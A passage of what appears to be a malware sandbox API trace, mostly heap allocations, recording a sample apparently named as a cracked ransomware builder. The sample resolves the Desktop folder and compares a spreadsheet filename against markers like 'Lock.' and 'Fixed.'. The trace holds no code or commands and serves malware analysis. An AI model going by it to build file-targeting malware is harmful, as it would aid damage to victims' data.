Flags=0x0, Size=0x8) returned 0x2a72628 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x92) returned 0x2a684b0 [0089.505] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alien ransomware builder cracked free.exe.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks", lpFilePart=0x8cf650*="alien ransomware builder cracked free.exe.bhacks") returned 0x48 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684b0 | out: hHeap=0x2af0000) returned 1 [0089.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe.bhacks")) returned 0xffffffff [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.506] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0089.506] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.506] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BlDya8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lDya8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dya8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ya8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gp-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HPz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pz6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uNsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NsS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sS.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0089.507] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.507] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6488 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BlDya8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lDya8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dya8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ya8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gp-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HPz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pz6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uNsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NsS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sS.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65d8 [0089.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65d8 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.509] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0089.509] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0089.509] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0089.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.510] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61e8 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75fd8 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0089.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0089.617] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0089.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.618] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0089.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: 